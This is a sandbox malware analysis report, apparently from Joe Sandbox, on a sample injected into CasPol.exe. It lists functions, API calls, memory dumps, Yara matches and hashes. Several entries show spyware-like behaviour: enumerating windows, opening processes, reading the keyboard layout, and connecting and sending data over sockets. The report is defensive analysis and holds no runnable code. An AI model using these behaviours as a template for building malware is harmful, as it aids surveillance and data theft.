                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                  • Instruction ID: 705fac4b2ef0ed0d18e498dac5b3377924e7d1501aba8971cd3dfab6f4dcb135
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF06D31408A189BC640CB68E9C2C1A33F9EF88B917AC4809F48DDF500CB31FDC28AA4
                                                                                                                                                                                                                                  Function 04575351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0457536F
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575381
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575394
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045753A5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045753B6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8d149652a30e12afad380bd845acf35f63c9fd19f59cf5221e6e2b3e178d481a
                                                                                                                                                                                                                                  • Instruction ID: 1cb02f843fe8e2600739f36501c655aab1c3e71d489bdfbb587738c3b47d5e1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d149652a30e12afad380bd845acf35f63c9fd19f59cf5221e6e2b3e178d481a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0B77082412AEBE6016F24B9814083FA1FB95A64345251EEC11B7661FF3E6C4ABBC4
                                                                                                                                                                                                                                  Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00443305
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00443317
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044332A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044333B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044334C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                  • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                                                                                                                                                  Function 10015867 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10015885
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10015897
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100158AA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100158BB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100158CC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                  • Instruction ID: ce460e5bac6ae8aad040ed738a165eee73e0f07a81d148bf5aaa982fd25e43d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF03074844A35DBE601EF549CC1C1537A0FB487113BD4A4AF4506E271C732A6838F82
                                                                                                                                                                                                                                  Function 10005600 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 405COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10005A13
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10005A1D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                  • Opcode ID: a948c79c5431ef993d5c7db46d81cca16daa77eda4f2e5c9dff6410b726f20a4
                                                                                                                                                                                                                                  • Instruction ID: 1f1fc70b04df716a51afbffcc927e8f2192dc69e1f8a2574b42c8594fe6aa3ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a948c79c5431ef993d5c7db46d81cca16daa77eda4f2e5c9dff6410b726f20a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E15075A0020ADBDB20CF48D5C099FB7B6FF84392B204529E8459B218DB32FE55CBE1
                                                                                                                                                                                                                                  Function 10005130 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 0-4289949731
                                                                                                                                                                                                                                  • Opcode ID: ccb344d31eb48d848c024517a1bbcab67a45931089d07f9d91156cb093629b5a
                                                                                                                                                                                                                                  • Instruction ID: 4e0e01030c44db973a3d1f6ba28005194938e7e7133fae708877df5374af968a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccb344d31eb48d848c024517a1bbcab67a45931089d07f9d91156cb093629b5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48717F35B046099BDB24CE5CD88099FB3F6FF89392720492EE946C7304DB32EA50CB91
                                                                                                                                                                                                                                  Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                                                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                                                                  • String ID: (FG
                                                                                                                                                                                                                                  • API String ID: 3142014140-2273637114
                                                                                                                                                                                                                                  • Opcode ID: fda56e45b393d4fbe729944c23874229a9f0d2b36fec767842575fa95d0cb5ce
                                                                                                                                                                                                                                  • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fda56e45b393d4fbe729944c23874229a9f0d2b36fec767842575fa95d0cb5ce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                                                                                                                                                  Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044D5C5
                                                                                                                                                                                                                                    • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,?,00414BBD,?,00000000,00000000,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                                                                                                                                                                    • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                                                                                                                                                                                                    • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                                                                                                                                  • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                                                                                                                                                                  Function 10005A30 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10005B96
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10005BA0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                  • Opcode ID: d9f5af590ba494f503317526f7cd22f2d922a699b17cc1a85d23b8301829a4f6
                                                                                                                                                                                                                                  • Instruction ID: 6c1523fb328dcf9ae6a9c50ad7b05ab603d263373fb6ba5bb73130adc7b49d3b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9f5af590ba494f503317526f7cd22f2d922a699b17cc1a85d23b8301829a4f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE4181717047098FA724DE58E8C095BB3E9FF846863610A2EF442C7619EB32FD15C7A1
                                                                                                                                                                                                                                  Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                    • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                    • Part of subcall function 0040428C: connect.WS2_32(?,00F5D160,00000010), ref: 004042A5
                                                                                                                                                                                                                                    • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                                  • String ID: XCG$`AG$>G
                                                                                                                                                                                                                                  • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                                  • Opcode ID: f44be819829dbbd5979bb4e2de6f637f2ceb77e339f3f40bbb8be689e254d46d
                                                                                                                                                                                                                                  • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f44be819829dbbd5979bb4e2de6f637f2ceb77e339f3f40bbb8be689e254d46d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                                                                                                                                  Function 04574BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 04574C1D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04574CE8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04574CF2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                                                                                                                                  • Opcode ID: dc542435f67a4077305b1f721a395f0b79616624f89141eca1ff5ff66d397376
                                                                                                                                                                                                                                  • Instruction ID: 6f5df4a8296fa875a7398bd1d38f3be2b3949f0e0a0bc7d20a17efdec7203f35
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc542435f67a4077305b1f721a395f0b79616624f89141eca1ff5ff66d397376
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D319571A00219FFDB21DF99F98099EBFFCFB86714B10417AE804A7210E775AA45EB50
                                                                                                                                                                                                                                  Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004427DF
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004427E9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                                                                                                                                  • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                                                                                                                                  • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                                                                                                                  Function 10014CE5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10014D25
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10014DF0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10014DFA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                                                                                                                                  • Opcode ID: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                  • Instruction ID: 1e7dba0bb730f9fc9de03a9782a9729fb1a7a61e514cee30f29b5b303d88c0bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83316175A00258AFDB11DF95DC81D9EBBFCEB89750B2140A6F8049B221DA71DA81CB91
                                                                                                                                                                                                                                  Function 10004890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10004988
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10004992
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
